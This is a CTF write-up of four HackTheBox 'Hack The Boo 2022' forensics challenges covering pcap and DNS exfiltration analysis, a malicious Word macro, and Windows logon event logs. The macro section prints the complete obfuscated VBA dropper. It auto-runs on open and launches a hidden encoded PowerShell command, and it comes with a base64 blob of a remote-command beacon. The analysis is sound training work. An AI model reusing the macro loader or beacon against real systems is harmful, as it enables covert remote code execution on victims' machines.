# Hack The Boo (Hackthebox-Forensic-2022) ###### tags: `ctf` `forensic` `network` `Computer processing` ## Wrong_spooky_season - Description: *"I told them it was too soon and in the wrong season to deploy such a website, but they assured me that theming it properly would be enough to stop the ghosts from haunting us. I was wrong." Now there is an internal breach in the Spooky Network and you need to find out what happened. Analyze the the network traffic and find how the scary ghosts got in and what they did.* - Attach file: https://drive.google.com/file/d/1eeZMz5PZ1mBLJOAk346S_1R9JYpeWJjY/view?usp=sharing So this is challenge about the **network analysis** so they talk about some stranger thing about website they posted and they caught that one through network adapter so after unzip file we get the pcap and look on file to know what they talk.  - So basicly, it include about somekind TCP Protocol and Processing about Handshake TCP and another HTTP Protocol and base on the Description they give. How ever i think the flag will be on HTTP protocol and if analysis that i will get that - So try using the filter with http and will got all of HTTP package: - So look on filter it give me some idea about they can attach the flag on the image on processing capture this PCAP but wrong it just kind fuzzing for player and i met that situation :smiley:, try crack analysis all of image can get but get nothing  - And yet it really nothing in metadata, but on the analysis HTTP protocol i see some supicious thing like someone want hack this local server through website JSP end on the http protocol it look the hacker have the bash so we will focus on tcp after that and exploit that to know what they do - So i read the number of package from 464 to end because on that processing the hacker do some kind on the bash and it really helpful , but on the first process i try it with my manual so i will locate the data on TCP data transfer and yet i get all of this by choosing `Statistics -> Protocol Hierachy -> Right click on data type on TCP protocol -> Apply filter -> Select.` - So choose once of them and look on data so we got somekind encrypt data and it on HEX format so try decrypt that and we got some kind we want like - Example: I choose Packet 481 and look data  - And I got Data: 69640a ==> id  - So you can do it manually and on the packet 500 you got what you want - Some kind like string base64 echo yup try to decrypt that but it reverse base 64 string so try to reverse that on right format and decode with base64 - But before do it that kind i will share fast method to read that and not need read that by manual and just doing with wireshark. `So you just choose the packet data and randomly pick once of that -> choose tcp.stream` and we got this So great and don't need to do that - Yeah and so i just coding exploit code and get the flag :smile: ``` import base64 base64message = "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" [::-1] base64byte = base64message.encode('ascii') message_byte = base64.b64decode(base64byte) message = message_byte.decode('ascii') print(message) ``` > Result: HTB{j4v4_5pr1ng_just_b3c4m3_j4v4_sp00ky!!} ## Trick or breach - Description: *Our company has been working on a secret project for almost a year. None knows about the subject, although rumor is that it is about an old Halloween legend where an old witch in the woods invented a potion to bring pumpkins to life, but in a more up-to-date approach. Unfortunately, we learned that malicious actors accessed our network in a massive cyber attack. Our security team found that the hack had occurred when a group of children came into the office's security external room for trick or treat. One of the children was found to be a paid actor and managed to insert a USB into one of the security personnel's computers, which allowed the hackers to gain access to the company's systems. We only have a network capture during the time of the incident. Can you find out if they stole the secret project?* - Attach file: https://drive.google.com/file/d/1k0JUy2R5Kn8cv1wcJAaMr9eyJ37SQzeq/view?usp=share_link So firstly, we need to extract that zip file and got pcap file so open that  - So we got bunch of DNS protocol and some kind website but onething i focus is subdomain of DNS :smile:. It look like HEX format we got that and so we have some method to take that subdomain by **`tshark command`** > tshark -r capture.pcap -T fields -e dns.qry.name > names.txt  - But file have duplicate so idk what to remove on that time althought have another way better but i do my way on that challenge ==> So python script is dabezt :smiling_face_with_smiling_eyes_and_hand_covering_mouth: ``` with open('names.txt', 'r') as f: doc = f.readlines() f.close() def unique(list1): doc_unique = [] coincident = [] replacing = [] for i in list1: if i in doc_unique: coincident.append(i) if i not in doc_unique: doc_unique.append(i) for i in coincident: i = i.replace('\n', '') i = i.replace('.pumpkincorp.com','') replacing.append(i) # for i in range(307): # print(i, doc_unique[i] == coincident[i]) # print(doc_unique[106], coincident[106]) return replacing doc_unique = unique(doc) for x in doc_unique: print(x) print(len(doc_unique)) ``` - So i just print the unique string on that file but meet some wrong and after i do save that it not give me change to extract that => So look back processing i got some script to check what i wrong :smiley:  - It look like they have 4 string on that files > `5500000000000000000000000018000000786c2f776f726b73.pumpkincorp.com` - So what i do is finding and deleting that on the unique file and i got that file completely ==> Try to covert that in execution because it on binary fomat => So using `HxD` to convert that  - So look on that i see PK header is format of zip file so save the convert on file.zip ==> and extract that and look on that file to got flag ==> So i quickly find that on `shareStrings.xml ` > HTB{M4g1c_c4nn0t_pr3v3nt_d4t4_br34ch} ## Halloween_Invitation > Description: *An email notification pops up. It's from your theater group. Someone decided to throw a party. The invitation looks awesome, but there is something suspicious about this document. Maybe you should take a look before you rent your banana costume.* Attach file: https://drive.google.com/file/d/1u3Yl61yPbngkdMYRhkit4sAaKtgYEI_6/view?usp=share_link - So unzip file and we got .docm file So next step what i do i extract that with binwalk because i look binwalk first on thought althought idea of challenge is using tool to read macro file but it same way to extract that with same theory :smiling_face_with_smiling_eyes_and_hand_covering_mouth: - So i look through that file after extract through binwalk and i look at on word folder and so i think the idea is try to know `vbaProject.bin` talk so after GG about vba bin it relate me about 'macro file' so ==> Find the tool to analysis that file. - After take a look, i find many method to try understand that vbafile [LINK](https://www.decalage.info/vba_tools) - So IDK why i can't install olevba but i get other choice is so you get this tool from that [LINK](https://github.com/fboldewin/reconstructer.org) **because the official link is die** :smile: and put that kind in VMware and turn of firewall on that because if you extract that on window it will erase that quickly than your hand :smiling_face_with_smiling_eyes_and_hand_covering_mouth: - Base on that [LINK](https://clickallthethings.wordpress.com/2019/08/16/extracting-macros-officemalscanner/) it relate about we can get that macro file about info throught vba file so try `info command` on we go this file ``` Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1TemplateProject.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() odhsjwpphlxnb Call lmavedb End Sub Private Sub odhsjwpphlxnb() Dim bnhupraoau As String CreateObject("WScript.Shell").currentdirectory = Environ("TEMP") bnhupraoau = sryivxjsdncj() dropPath = Environ("TEMP") Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("53637269707469") & uxdufnkjlialsyp("6e672e46696c6553797374656d4f626a656374")) Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & uxdufnkjlialsyp("5c68697374") & uxdufnkjlialsyp("6f72792e62616b"), True) dfdjqgaqhvxxi.Write bnhupraoau dfdjqgaqhvxxi.Close End Sub Private Function wdysllqkgsbzs(strBytes) As String Dim aNumbers Dim fxnrfzsdxmcvranp As String Dim iIter fxnrfzsdxmcvranp = "" aNumbers = Split(strBytes) For iIter = LBound(aNumbers) To UBound(aNumbers) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter)) Next wdysllqkgsbzs = fxnrfzsdxmcvranp End Function Private Function okbzichkqtto() As String Dim fxnrfzsdxmcvranp As String fxnrfzsdxmcvranp = "" fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") & uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313230203635203638203130") & uxdufnkjlialsyp("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203638203635203635203734") & uxdufnkjlialsyp("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") & uxdufnkjlialsyp("37203438203635203737203635203635203438203635203638203737203635203930")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203132312036352036382038312036352037372036352036352035") & uxdufnkjlialsyp("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") & uxdufnkjlialsyp("3130203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") & uxdufnkjlialsyp("36352031313820363520363720353620363520373420313139203635203535203635203637203831")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") & uxdufnkjlialsyp("38203635203835")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") & uxdufnkjlialsyp("203635203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203637203438203635203836203831203636203132322036352037312038") & uxdufnkjlialsyp("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") & uxdufnkjlialsyp("2031313720363520373120393920363520373320363520363520313136203635203730203835203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") & uxdufnkjlialsyp("3635203731203831203635203738203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313232203635203731203733203635") & uxdufnkjlialsyp("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") & uxdufnkjlialsyp("20313033203635203639203635203635203130312031313920363520313035203635203639")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363920363520313030203831203636203438203635203731203130332036352039") & uxdufnkjlialsyp("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520393720383120363620") & uxdufnkjlialsyp("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313139203636203131312036352037312031303720363520393820363520363620313038") & uxdufnkjlialsyp("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") & uxdufnkjlialsyp("37203635203732")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") & uxdufnkjlialsyp("20363520373120383520363520393920313139203636203438203635203639203438203635203930")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") & uxdufnkjlialsyp("37203635203930203831203636203637")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") & uxdufnkjlialsyp("37322037332036352039392031313920363620313132203635203731")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") & uxdufnkjlialsyp("203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37342036352036362031323220363520363720") & uxdufnkjlialsyp("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") & uxdufnkjlialsyp("2037312038352036352039392031303320363620313232203635203637")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352038312036352036362035352036352036372037332036352038") & uxdufnkjlialsyp("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("383120363620353420363520373120363920363520") & uxdufnkjlialsyp("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31313220363520373220343820363520") & uxdufnkjlialsyp("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3637") & uxdufnkjlialsyp("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") & uxdufnkjlialsyp("373120383520363520313031")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352031303320") & uxdufnkjlialsyp("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") & uxdufnkjlialsyp("363720363520363520383520313139203636203438203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") & uxdufnkjlialsyp("36352037322037332036352039382031313920363620313231203635203730203839")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520383920383120363620313231203635203731203130372036352038392038") & uxdufnkjlialsyp("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036352031303720363520373220373320363520383020383120") & uxdufnkjlialsyp("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352037") & uxdufnkjlialsyp("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") & uxdufnkjlialsyp("203733")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203739203131392036352031303720363520373220383120363520383020383120363620") & uxdufnkjlialsyp("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") & uxdufnkjlialsyp("3820363520373220383120363520393720363520363620313138")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203731203831203635203733") & uxdufnkjlialsyp("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") & uxdufnkjlialsyp("3635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") & uxdufnkjlialsyp("3831203635203733203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363620383120") & uxdufnkjlialsyp("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") & uxdufnkjlialsyp("203635203637203733203635203831203831203636203439203635203732203831203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") & uxdufnkjlialsyp("20313033")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") & uxdufnkjlialsyp("3131362036352036392037332036352039382031313920363620313037")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373220") & uxdufnkjlialsyp("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3438203635") & uxdufnkjlialsyp("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") & uxdufnkjlialsyp("203836203635203636")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312036352036382031303320363520373620313033203636203732203635203731") & uxdufnkjlialsyp("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") & uxdufnkjlialsyp("20313033203635203637203438")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352039372031303320363620") & uxdufnkjlialsyp("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313032") & uxdufnkjlialsyp("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520353220363520373220343820363520383320363520363620") & uxdufnkjlialsyp("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373220373320363520383820313139203635203132322036352036382038312036352037382038") & uxdufnkjlialsyp("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635")) fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("393920313033203635203131392036352036382038352036352031303220383120") & uxdufnkjlialsyp("3635203631")) okbzichkqtto = fxnrfzsdxmcvranp End Function Private Function sryivxjsdncj() As String Dim fxnrfzsdxmcvranp As String fxnrfzsdxmcvranp = "" fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + okbzichkqtto() sryivxjsdncj = fxnrfzsdxmcvranp End Function Sub lmavedb() dropPath = Environ("TEMP") Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("536372697074696e672e46696c6553797374") & uxdufnkjlialsyp("656d4f626a656374")) Set ktmlmpc = rxnnvnfqufrzqfhnff.OpenTextFile(dropPath & uxdufnkjlialsyp("5c68") & uxdufnkjlialsyp("6973746f72792e62616b")) secret = ktmlmpc.ReadAll ktmlmpc.Close Code = "powershell -WindowStyle hidden -e """ & secret x = Shell(Code, 1) End Sub ``` - So after read that code VB Language and have some kind strange on that thing like this line `Code = "powershell -WindowStyle hidden -e """ & secret` so i try to think it will relate a bunch of the string on the function `fxnrfzsdxmcvranp` so try get all of that take string inbound of that and find what i got  - After do erase that i got that string and try to put that kind on the [Cyberchef](https://gchq.github.io/CyberChef/) and i think it look like HEX format so try convert that to string and after that convert that from decimal and we got that ``` JABzAD0AJ A3ADcALgA3ADQALgAxAD AOAAuADUAMgA6ADgAMAA4ADAAJwA7ACQAaQA9ACcAZAA0ADMAYgBjAGMANgBkA 0AMAA0ADMAZgAyADQAMAA AC0ANwBlAGEAMgAzAGEAMgBjACcAOwAkAHAAPQA AGgAdAB0AHAAOgAvAC8AJwA7ACQAdgA9AEkAbgB2AG8AawBlACAUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQBzAAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvAGQANAAzAGIAYwBjADYAZAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQB AHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAH AZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMAA0ADMAZgAyADQAMAA5ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACI QB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AKQA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkA BiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByA kAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQB AHQAaABvAGQAIAAtAFUAcgBpACAAJABwACQAcwAvADcAZQBhADIAMwBhADIAYwAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0ASABUAEIAewA1AHUAcAAzAHIAXwAzADQA B5AF8AbQA0AGMAcgAwADUAfQA= ``` - So it look like base64 format so try to convert that to readable and we got that flag from that by cyberchef  > HTB{5up3r_345y_m4cr05} ## Downgrade Attach file: https://drive.google.com/file/d/1Ak0E395A9VxALj5cJ_boy_lIgRmyPI44/view?usp=sharing So after extract file we got bunch of event log and i try to netcat on that server and answer the question > 1. Which event log contains information about logon and logoff events? (for example: Setup) - First i gg about that and it tell about that relate security so i try to find that log and it really exist > Answer: Security > 2. What is the event id for logs for a successful logon to a local computer? (for example: 1337) - So try to look on the event on the security log and we got event ID of logon is 4624 or 4648 - 4624 : `Really successful and get GUI` - 4648 : `This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command`. > Answer: 4624 > 3. Which is the default Active Directory authentication protocol? (for example: http)  - So it really exist many of authentication protocol and Keberos is occur is once of that it by using many time so it answer > Answer: Keberos > 4. Looking at all the logon events, what is the AuthPackage that stands out as different from all the rest? - With that question we need to find and using filter to choose only Logon event to look it quickly to find that kind see all of event  - And so let find because we just find logon is occur many time on the 28/09/2022 so focus of that and i find it occur at `8:10:57 pm` and yet NTLM is different and that is answer we want > Answer: NTLM > 5. What is the timestamp of the suspicious login (yyyy-MM-ddTHH:mm:ss) UTC? (for example, 2021-10-10T08:23:12) > - So the big diffirent is using the UTC and it not sure apply in my time so it fuzzing about to submit that kind because the above event is relly the suspicious login because author of login is kali `(U know wat is say)`  - So gg and give thanks for friend to help me find diff UTC or time on event log and 8PM can know is 1PM in UTC ==> UTC using 0-24H so it can be `2022-09-28T08:10:57 = 2022-09-28T13:10:57` >Answer: 2022-09-28T13:10:57 > Flag: HTB{4n0th3r_d4y_4n0th3r_d0wngr4d3...} ## So after hacktheboo the bunch of the idea to solve forensic challenge like very intersting and it push me to share that kind. The other challenge of forensic is POOF which i not solve but i know result. So be happy to hacking with hacktheboo and look like next contest. So i wish reader can have more knowledege through my process :smiling_face_with_smiling_eyes_and_hand_covering_mouth:. Happy hacking GUY !! Seevrysoon